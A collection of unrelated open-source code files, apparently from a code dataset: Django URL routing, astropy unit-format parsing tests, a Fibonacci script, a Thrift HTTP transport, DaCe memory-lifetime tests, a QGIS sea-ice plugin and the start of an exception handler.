1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from adminapp import views as adminapp_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', adminapp_views.index, name="Homepage" ),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('dj-rest-auth/', include('dj_rest_auth.urls')),
path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))
]
|
the-stack_0_3714 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Regression tests for the units.format package
"""
import pytest
from numpy.testing import assert_allclose
from astropy.tests.helper import catch_warnings
from astropy import units as u
from astropy.constants import si
from astropy.units import core
from astropy.units import format as u_format
from astropy.units.utils import is_effectively_unity
@pytest.mark.parametrize('strings, unit', [
(["m s", "m*s", "m.s"], u.m * u.s),
(["m/s", "m*s**-1", "m /s", "m / s", "m/ s"], u.m / u.s),
(["m**2", "m2", "m**(2)", "m**+2", "m+2", "m^(+2)"], u.m ** 2),
(["m**-3", "m-3", "m^(-3)", "/m3"], u.m ** -3),
(["m**(1.5)", "m(3/2)", "m**(3/2)", "m^(3/2)"], u.m ** 1.5),
(["2.54 cm"], u.Unit(u.cm * 2.54)),
(["10+8m"], u.Unit(u.m * 1e8)),
# This is the VOUnits documentation, but doesn't seem to follow the
# unity grammar (["3.45 10**(-4)Jy"], 3.45 * 1e-4 * u.Jy)
(["sqrt(m)"], u.m ** 0.5),
(["dB(mW)", "dB (mW)"], u.DecibelUnit(u.mW)),
(["mag"], u.mag),
(["mag(ct/s)"], u.MagUnit(u.ct / u.s)),
(["dex"], u.dex),
(["dex(cm s**-2)", "dex(cm/s2)"], u.DexUnit(u.cm / u.s**2))])
def test_unit_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.Generic.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', ['sin( /pixel /s)', 'mag(mag)',
'dB(dB(mW))', 'dex()'])
def test_unit_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.Generic.parse(string)
@pytest.mark.parametrize('strings, unit', [
(["0.1nm"], u.AA),
(["mW/m2"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["mW/(m2)"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["km/s", "km.s-1"], u.km / u.s),
(["10pix/nm"], u.Unit(10 * u.pix / u.nm)),
(["1.5x10+11m"], u.Unit(1.5e11 * u.m)),
(["1.5×10+11m"], u.Unit(1.5e11 * u.m)),
(["m2"], u.m ** 2),
(["10+21m"], u.Unit(u.m * 1e21)),
(["2.54cm"], u.Unit(u.cm * 2.54)),
(["20%"], 0.20 * u.dimensionless_unscaled),
(["10+9"], 1.e9 * u.dimensionless_unscaled),
(["2x10-9"], 2.e-9 * u.dimensionless_unscaled),
(["---"], u.dimensionless_unscaled),
(["ma"], u.ma),
(["mAU"], u.mAU),
(["uarcmin"], u.uarcmin),
(["uarcsec"], u.uarcsec),
(["kbarn"], u.kbarn),
(["Gbit"], u.Gbit),
(["Gibit"], 2 ** 30 * u.bit),
(["kbyte"], u.kbyte),
(["mRy"], 0.001 * u.Ry),
(["mmag"], u.mmag),
(["Mpc"], u.Mpc),
(["Gyr"], u.Gyr),
(["°"], u.degree),
(["°/s"], u.degree / u.s),
(["Å"], u.AA),
(["Å/s"], u.AA / u.s),
(["\\h"], si.h)])
def test_cds_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.CDS.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'0.1 nm',
'solMass(3/2)',
'km / s',
'km s-1',
'pix0.1nm',
'pix/(0.1nm)',
'km*s',
'km**2',
'5x8+3m',
'0.1---',
'---m',
'm---',
'mag(s-1)',
'dB(mW)',
'dex(cm s-2)'])
def test_cds_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.CDS.parse(string)
# These examples are taken from the EXAMPLES section of
# https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/general/ogip_93_001/
@pytest.mark.parametrize('strings, unit', [
(["count /s", "count/s", "count s**(-1)", "count / s", "count /s "],
u.count / u.s),
(["/pixel /s", "/(pixel * s)"], (u.pixel * u.s) ** -1),
(["count /m**2 /s /eV", "count m**(-2) * s**(-1) * eV**(-1)",
"count /(m**2 * s * eV)"],
u.count * u.m ** -2 * u.s ** -1 * u.eV ** -1),
(["erg /pixel /s /GHz", "erg /s /GHz /pixel", "erg /pixel /(s * GHz)"],
u.erg / (u.s * u.GHz * u.pixel)),
(["keV**2 /yr /angstrom", "10**(10) keV**2 /yr /m"],
# Though this is given as an example, it seems to violate the rules
# of not raising scales to powers, so I'm just excluding it
# "(10**2 MeV)**2 /yr /m"
u.keV**2 / (u.yr * u.angstrom)),
(["10**(46) erg /s", "10**46 erg /s", "10**(39) J /s", "10**(39) W",
"10**(15) YW", "YJ /fs"],
10**46 * u.erg / u.s),
(["10**(-7) J /cm**2 /MeV", "10**(-9) J m**(-2) eV**(-1)",
"nJ m**(-2) eV**(-1)", "nJ /m**2 /eV"],
10 ** -7 * u.J * u.cm ** -2 * u.MeV ** -1),
(["sqrt(erg /pixel /s /GHz)", "(erg /pixel /s /GHz)**(0.5)",
"(erg /pixel /s /GHz)**(1/2)",
"erg**(0.5) pixel**(-0.5) s**(-0.5) GHz**(-0.5)"],
(u.erg * u.pixel ** -1 * u.s ** -1 * u.GHz ** -1) ** 0.5),
(["(count /s) (/pixel /s)", "(count /s) * (/pixel /s)",
"count /pixel /s**2"],
(u.count / u.s) * (1.0 / (u.pixel * u.s)))])
def test_ogip_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.OGIP.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'log(photon /m**2 /s /Hz)',
'sin( /pixel /s)',
'log(photon /cm**2 /s /Hz) /(sin( /pixel /s))',
'log(photon /cm**2 /s /Hz) (sin( /pixel /s))**(-1)',
'dB(mW)', 'dex(cm/s**2)'])
def test_ogip_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.OGIP.parse(string)
@pytest.mark.parametrize('unit', [val for key, val in u.__dict__.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip(unit):
a = core.Unit(unit.to_string('generic'), format='generic')
b = core.Unit(unit.decompose().to_string('generic'), format='generic')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.VOUnit._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_vo_unit(unit):
a = core.Unit(unit.to_string('vounit'), format='vounit')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
if unit not in (u.mag, u.dB):
ud = unit.decompose().to_string('vounit')
assert ' ' not in ud
b = core.Unit(ud, format='vounit')
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.Fits._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_fits(unit):
s = unit.to_string('fits')
a = core.Unit(s, format='fits')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.CDS._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_cds(unit):
a = core.Unit(unit.to_string('cds'), format='cds')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('cds'), format='cds')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.OGIP._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_ogip(unit):
a = core.Unit(unit.to_string('ogip'), format='ogip')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('ogip'), format='ogip')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
def test_fits_units_available():
u_format.Fits._units
def test_vo_units_available():
u_format.VOUnit._units
def test_cds_units_available():
u_format.CDS._units
def test_cds_non_ascii_unit():
"""Regression test for #5350. This failed with a decoding error as
μas could not be represented in ascii."""
from astropy.units import cds
with cds.enable():
u.radian.find_equivalent_units(include_prefix_units=True)
def test_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert fluxunit.to_string('latex') == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_new_style_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert "{0:latex}".format(fluxunit) == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_latex_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex = r'$\mathrm{1 \times 10^{-24}\,\frac{erg}{Hz\,s\,cm^{2}}}$'
assert fluxunit.to_string('latex') == latex
def test_latex_inline_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex_inline = (r'$\mathrm{1 \times 10^{-24}\,erg'
r'\,Hz^{-1}\,s^{-1}\,cm^{-2}}$')
assert fluxunit.to_string('latex_inline') == latex_inline
@pytest.mark.parametrize('format_spec, string', [
('generic', 'erg / (cm2 s)'),
('s', 'erg / (cm2 s)'),
('console', ' erg \n ------\n s cm^2'),
('latex', '$\\mathrm{\\frac{erg}{s\\,cm^{2}}}$'),
('latex_inline', '$\\mathrm{erg\\,s^{-1}\\,cm^{-2}}$'),
('>20s', ' erg / (cm2 s)')])
def test_format_styles(format_spec, string):
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert format(fluxunit, format_spec) == string
def test_flatten_to_known():
myunit = u.def_unit("FOOBAR_One", u.erg / u.Hz)
assert myunit.to_string('fits') == 'erg Hz-1'
myunit2 = myunit * u.bit ** 3
assert myunit2.to_string('fits') == 'bit3 erg Hz-1'
def test_flatten_impossible():
myunit = u.def_unit("FOOBAR_Two")
with u.add_enabled_units(myunit), pytest.raises(ValueError):
myunit.to_string('fits')
def test_console_out():
"""
Issue #436.
"""
u.Jy.decompose().to_string('console')
def test_flexible_float():
assert u.min._represents.to_string('latex') == r'$\mathrm{60\,s}$'
def test_fraction_repr():
area = u.cm ** 2.0
assert '.' not in area.to_string('latex')
fractional = u.cm ** 2.5
assert '5/2' in fractional.to_string('latex')
assert fractional.to_string('unicode') == 'cm⁵⸍²'
def test_scale_effectively_unity():
"""Scale just off unity at machine precision level is OK.
Ensures #748 does not recur
"""
a = (3. * u.N).cgs
assert is_effectively_unity(a.unit.scale)
assert len(a.__repr__().split()) == 3
def test_percent():
"""Test that the % unit is properly recognized. Since % is a special
symbol, this goes slightly beyond the round-tripping tested above."""
assert u.Unit('%') == u.percent == u.Unit(0.01)
assert u.Unit('%', format='cds') == u.Unit(0.01)
assert u.Unit(0.01).to_string('cds') == '%'
with pytest.raises(ValueError):
u.Unit('%', format='fits')
with pytest.raises(ValueError):
u.Unit('%', format='vounit')
def test_scaled_dimensionless():
"""Test that scaled dimensionless units are properly recognized in generic
and CDS, but not in fits and vounit."""
assert u.Unit('0.1') == u.Unit(0.1) == 0.1 * u.dimensionless_unscaled
assert u.Unit('1.e-4') == u.Unit(1.e-4)
assert u.Unit('10-4', format='cds') == u.Unit(1.e-4)
assert u.Unit('10+8').to_string('cds') == '10+8'
with pytest.raises(ValueError):
u.Unit(0.15).to_string('fits')
assert u.Unit(0.1).to_string('fits') == '10**-1'
with pytest.raises(ValueError):
u.Unit(0.1).to_string('vounit')
def test_deprecated_did_you_mean_units():
try:
u.Unit('ANGSTROM', format='fits')
except ValueError as e:
assert 'Did you mean Angstrom or angstrom?' in str(e)
try:
u.Unit('crab', format='ogip')
except ValueError as e:
assert 'Crab (deprecated)' in str(e)
assert 'mCrab (deprecated)' in str(e)
try:
u.Unit('ANGSTROM', format='vounit')
except ValueError as e:
assert 'angstrom (deprecated)' in str(e)
assert '0.1nm' in str(e)
assert str(e).count('0.1nm') == 1
with catch_warnings() as w:
u.Unit('angstrom', format='vounit')
assert len(w) == 1
assert '0.1nm' in str(w[0].message)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_fits_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.Fits().parse(string)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_vounit_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.VOUnit().parse(string)
def test_vounit_binary_prefix():
u.Unit('KiB', format='vounit') == u.Unit('1024 B')
u.Unit('Kibyte', format='vounit') == u.Unit('1024 B')
u.Unit('Kibit', format='vounit') == u.Unit('1024 B')
with catch_warnings() as w:
u.Unit('kibibyte', format='vounit')
assert len(w) == 1
def test_vounit_unknown():
assert u.Unit('unknown', format='vounit') is None
assert u.Unit('UNKNOWN', format='vounit') is None
assert u.Unit('', format='vounit') is u.dimensionless_unscaled
def test_vounit_details():
assert u.Unit('Pa', format='vounit') is u.Pascal
# The da- prefix is not allowed, and the d- prefix is discouraged
assert u.dam.to_string('vounit') == '10m'
assert u.Unit('dam dag').to_string('vounit') == '100g m'
def test_vounit_custom():
x = u.Unit("'foo' m", format='vounit')
x_vounit = x.to_string('vounit')
assert x_vounit == "'foo' m"
x_string = x.to_string()
assert x_string == "foo m"
x = u.Unit("m'foo' m", format='vounit')
assert x.bases[1]._represents.scale == 0.001
x_vounit = x.to_string('vounit')
assert x_vounit == "m m'foo'"
x_string = x.to_string()
assert x_string == 'm mfoo'
def test_vounit_implicit_custom():
x = u.Unit("furlong/week", format="vounit")
assert x.bases[0]._represents.scale == 1e-15
assert x.bases[0]._represents.bases[0].name == 'urlong'
def test_fits_scale_factor():
with pytest.raises(ValueError):
x = u.Unit('1000 erg/s/cm**2/Angstrom', format='fits')
with pytest.raises(ValueError):
x = u.Unit('12 erg/s/cm**2/Angstrom', format='fits')
x = u.Unit('10+2 erg/s/cm**2/Angstrom', format='fits')
assert x == 100 * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**2 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20)*erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
x = u.Unit(1.2 * u.erg)
with pytest.raises(ValueError):
x.to_string(format='fits')
x = u.Unit(100.0 * u.erg)
assert x.to_string(format='fits') == '10**2 erg'
|
the-stack_0_3715 | def fibonacciSequence(N):
result = []
previous = 1
previousPrevious = 1
result.append(1)
result.append(1)
for i in range(N - 3):
current = previous + previousPrevious
result.append(current)
previousPrevious = previous
previous = current
return result
print(fibonacciSequence(100))
|
the-stack_0_3717 | """
Copyright (c) 2019 4masaka
This software is released under the MIT License.
https://opensource.org/licenses/MIT
"""
from typing import Dict, Optional
import aiohttp
from frugal.aio.transport import FTransportBase
from frugal.context import FContext
from thrift.transport.TTransport import TMemoryBuffer, TTransportBase
class HttpClient(FTransportBase):
def __init__(
self, uri: str, headers: Optional[Dict] = None, request_capacity: int = 0
) -> None:
super().__init__(request_capacity)
self.uri = uri
self.headers = {
"Content-Type": "application/x-thrift",
"Accept": "application/x-thrift",
}
self.headers.update(headers)
def is_open(self) -> bool:
return True
def open(self) -> None:
return True
async def close(self) -> None:
NotImplementedError()
async def oneway(self, context, payload):
NotImplementedError()
async def set_monitor(self, monitor):
NotImplementedError()
async def request(self, context: FContext, payload) -> TTransportBase:
payload = payload[4:]
async with aiohttp.request(
"POST",
url=self.uri,
data=payload,
headers=self.headers
) as res:
return TMemoryBuffer(await res.content.read())
class HttpClientFactory:
def __init__(self, host: str, port: int = 443, scheme: str = "https"):
self.host = host
self.port = port
self.scheme = scheme
def get_client(self, path: str, headers: Optional[Dict] = None) -> HttpClient:
uri = f"{self.scheme}://{self.host}:{self.port}{path}"
return HttpClient(uri, headers=headers)
|
the-stack_0_3718 | # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests different allocation lifetimes. """
import pytest
import dace
from dace.codegen.targets import framecode
from dace.sdfg import infer_types
import numpy as np
N = dace.symbol('N')
def _test_determine_alloc(lifetime: dace.AllocationLifetime, unused: bool = False) -> dace.SDFG:
""" Creates an SDFG playground for determining allocation. """
sdfg = dace.SDFG('lifetimetest')
sdfg.add_array('A', [N], dace.float64)
sdfg.add_array('B', [N], dace.float64)
sdfg.add_transient('unused', [N], dace.float64, lifetime=lifetime)
state = sdfg.add_state()
me, mx = state.add_map('m', dict(i='0:N'))
#########################################################################
nsdfg = dace.SDFG('nested')
nsdfg.add_array('A', [N], dace.float64)
nsdfg.add_array('B', [N], dace.float64)
nsdfg.add_transient('tmp', [N], dace.float64, dace.StorageType.GPU_Global, lifetime=lifetime)
nsdfg.add_transient('tmp2', [1], dace.float64, dace.StorageType.Register, lifetime=lifetime)
nstate = nsdfg.add_state()
ime, imx = nstate.add_map('m2', dict(i='0:20'), schedule=dace.ScheduleType.GPU_Device)
t1 = nstate.add_access('tmp')
t2 = nstate.add_access('tmp2')
nstate.add_nedge(t1, t2, dace.Memlet('tmp[0]'))
nstate.add_memlet_path(nstate.add_read('A'), ime, t1, memlet=dace.Memlet('A[i]'))
nstate.add_memlet_path(t2, imx, nstate.add_write('B'), memlet=dace.Memlet('B[0]', wcr='lambda a,b: a+b'))
#########################################################################
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {'A'}, {'B'})
state.add_memlet_path(state.add_read('A'), me, nsdfg_node, dst_conn='A', memlet=dace.Memlet('A[0:N]'))
state.add_memlet_path(nsdfg_node, mx, state.add_write('B'), src_conn='B', memlet=dace.Memlet('B[0:N]'))
# Set default storage/schedule types in SDFG
infer_types.set_default_schedule_and_storage_types(sdfg, None)
return sdfg, (sdfg, state, me, nsdfg, nstate, ime)
def _check_alloc(id, name, codegen, scope):
# for sdfg_id, _, node in codegen.to_allocate[scope]:
# if id == sdfg_id and name == node.data:
# return True
for sdfg, _, node, _, _, _ in codegen.to_allocate[scope]:
if sdfg.sdfg_id == id and name == node.data:
return True
return False
def test_determine_alloc_scope():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Scope)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# tmp cannot be allocated within the inner scope because it is GPU_Global
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-1])
def test_determine_alloc_state():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.State, unused=True)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# Ensure that unused transients are not allocated
assert not any('__0_unused' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-2])
def test_determine_alloc_sdfg():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.SDFG)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert _check_alloc(1, 'tmp', codegen, scopes[-3])
assert _check_alloc(1, 'tmp2', codegen, scopes[-3])
def test_determine_alloc_global():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Global)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert any('__1_tmp' in field for field in codegen.statestruct)
assert any('__1_tmp2' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, sdfg)
assert _check_alloc(1, 'tmp2', codegen, sdfg)
@pytest.mark.gpu
def test_persistent_gpu_copy_regression():
sdfg = dace.SDFG('copynd')
state = sdfg.add_state()
nsdfg = dace.SDFG('copynd_nsdfg')
nstate = nsdfg.add_state()
sdfg.add_array("input", [2, 2], dace.float64)
sdfg.add_array("input_gpu", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
sdfg.add_array("__return", [2, 2], dace.float64)
nsdfg.add_array("ninput", [2, 2],
dace.float64,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("transient_heap", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("noutput", [2, 2],
dace.float64,
storage=dace.dtypes.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
a_trans = nstate.add_access("transient_heap")
nstate.add_edge(nstate.add_read("ninput"), None, a_trans, None, nsdfg.make_array_memlet("transient_heap"))
nstate.add_edge(a_trans, None, nstate.add_write("noutput"), None, nsdfg.make_array_memlet("transient_heap"))
a_gpu = state.add_read("input_gpu")
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {"ninput"}, {"noutput"})
wR = state.add_write("__return")
state.add_edge(state.add_read("input"), None, a_gpu, None, sdfg.make_array_memlet("input"))
state.add_edge(a_gpu, None, nsdfg_node, "ninput", sdfg.make_array_memlet("input_gpu"))
state.add_edge(nsdfg_node, "noutput", wR, None, sdfg.make_array_memlet("__return"))
result = sdfg(input=np.ones((2, 2), dtype=np.float64))
assert np.all(result == np.ones((2, 2)))
@pytest.mark.gpu
def test_persistent_gpu_transpose_regression():
@dace.program
def test_persistent_transpose(A: dace.float64[5, 3]):
return np.transpose(A)
sdfg = test_persistent_transpose.to_sdfg()
sdfg.expand_library_nodes()
sdfg.simplify()
sdfg.apply_gpu_transformations()
for _, _, arr in sdfg.arrays_recursive():
if arr.transient and arr.storage == dace.StorageType.GPU_Global:
arr.lifetime = dace.AllocationLifetime.Persistent
A = np.random.rand(5, 3)
result = sdfg(A=A)
assert np.allclose(np.transpose(A), result)
def test_alloc_persistent_register():
""" Tries to allocate persistent register array. Should fail. """
@dace.program
def lifetimetest(input: dace.float64[N]):
tmp = dace.ndarray([1], input.dtype)
return tmp + 1
sdfg: dace.SDFG = lifetimetest.to_sdfg()
sdfg.arrays['tmp'].storage = dace.StorageType.Register
sdfg.arrays['tmp'].lifetime = dace.AllocationLifetime.Persistent
try:
sdfg.validate()
raise AssertionError('SDFG should not be valid')
except dace.sdfg.InvalidSDFGError:
print('Exception caught, test passed')
def test_alloc_persistent():
@dace.program
def persistentmem(output: dace.int32[1]):
tmp = dace.ndarray([1], output.dtype, lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
tmp[0] = 0
else:
tmp[0] += 3
output[0] = tmp[0]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([1], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
value[0] = 2
csdfg(output=value)
assert value[0] == 3
csdfg(output=value)
assert value[0] == 6
del csdfg
def test_alloc_persistent_threadlocal():
@dace.program
def persistentmem(output: dace.int32[2]):
tmp = dace.ndarray([2],
output.dtype,
storage=dace.StorageType.CPU_ThreadLocal,
lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
for i in dace.map[0:2]:
tmp[i] = i
else:
for i in dace.map[0:2]:
tmp[i] += 3
output[i] = tmp[i]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([2], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
assert value[1] == 1
value[0] = 4
value[1] = 2
csdfg(output=value)
assert value[0] == 3
assert value[1] == 4
csdfg(output=value)
assert value[0] == 6
assert value[1] == 7
del csdfg
def test_alloc_multistate():
i = dace.symbol('i')
sdfg = dace.SDFG('multistate')
sdfg.add_array('A', [20], dace.float64)
sdfg.add_array('B', [20], dace.float64)
sdfg.add_transient('tmp', [i + 1], dace.float64)
init = sdfg.add_state()
end = sdfg.add_state()
s2 = sdfg.add_state()
sdfg.add_loop(init, s2, end, 'i', '0', 'i < 5', 'i + 1')
s1 = sdfg.add_state_before(s2)
ar = s1.add_read('A')
tw = s1.add_write('tmp')
s1.add_nedge(ar, tw, dace.Memlet('A[0:i+1]'))
tr = s2.add_read('tmp')
bw = s2.add_write('B')
s2.add_nedge(tr, bw, dace.Memlet('tmp'))
A = np.random.rand(20)
B = np.random.rand(20)
sdfg(A=A, B=B)
assert np.allclose(A[:5], B[:5])
def test_nested_view_samename():
@dace.program
def incall(a, b):
tmp = a.reshape([10, 2])
tmp[:] += 1
return tmp
@dace.program
def top(a: dace.float64[20]):
tmp = dace.ndarray([20], dace.float64, lifetime=dace.AllocationLifetime.Persistent)
return incall(a, tmp)
sdfg = top.to_sdfg(simplify=False)
a = np.random.rand(20)
ref = a.copy()
b = sdfg(a)
assert np.allclose(b, ref.reshape(10, 2) + 1)
def test_nested_persistent():
@dace.program
def nestpers(a):
tmp = np.ndarray([20], np.float64)
tmp[:] = a + 1
return tmp
@dace.program
def toppers(a: dace.float64[20]):
return nestpers(a)
sdfg = toppers.to_sdfg(simplify=False)
for _, _, arr in sdfg.arrays_recursive():
if arr.transient:
arr.lifetime = dace.AllocationLifetime.Persistent
a = np.random.rand(20)
b = sdfg(a)
assert np.allclose(b, a + 1)
def test_persistent_scalar():
@dace.program
def perscal(a: dace.float64[20]):
tmp = dace.define_local_scalar(dace.float64, lifetime=dace.AllocationLifetime.Persistent)
tmp[:] = a[1] + 1
return tmp
a = np.random.rand(20)
b = perscal(a)
assert np.allclose(b, a[1] + 1)
if __name__ == '__main__':
test_determine_alloc_scope()
test_determine_alloc_state()
test_determine_alloc_sdfg()
test_determine_alloc_global()
test_persistent_gpu_copy_regression()
test_persistent_gpu_transpose_regression()
test_alloc_persistent_register()
test_alloc_persistent()
test_alloc_persistent_threadlocal()
test_alloc_multistate()
test_nested_view_samename()
test_nested_persistent()
test_persistent_scalar()
|
the-stack_0_3719 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
SeaIceData
A QGIS plugin
Downloads sea ice concentration data from NSIDC
-------------------
begin : 2014-10-02
copyright : (C) 2014 by Louise Ireland
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
# Initialize Qt resources from file resources.py
import resources
# Import the code for the dialog
from seaicedatadialog import SeaIceDataDialog
import os.path
class SeaIceData:
def __init__(self, iface):
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value("locale/userLocale")[0:2]
localePath = os.path.join(self.plugin_dir, 'i18n', 'seaicedata_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Create the dialog (after translation) and keep reference
self.dlg = SeaIceDataDialog()
def initGui(self):
# Create action that will start plugin configuration
self.action = QAction(
QIcon(":/plugins/seaicedata/icon.png"),
u"Sea Ice Data Downloader", self.iface.mainWindow())
# connect the action to the run method
self.action.triggered.connect(self.run)
# Add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu(u"&Sea Ice Data Downloader", self.action)
def unload(self):
# Remove the plugin menu item and icon
self.iface.removePluginMenu(u"&Sea Ice Data Downloader", self.action)
self.iface.removeToolBarIcon(self.action)
# run method that performs all the real work
def run(self):
# show the dialog
self.dlg.show()
|
the-stack_0_3720 | import inspect
import logging
from typing import Any, Dict, Optional
from panoramic.cli.husky.common.exception_enums import (
ComponentType,
ExceptionGroup,
ExceptionSeverity,
)
from panoramic.cli.husky.common.util import exception_to_string_with_traceback
logger = logging.getLogger(__name__)
class ExceptionTags:
REQUEST_DATA = '_request_data'
class ExceptionHandler:
@classmethod
def track_exception(
cls,
exc: Exception,
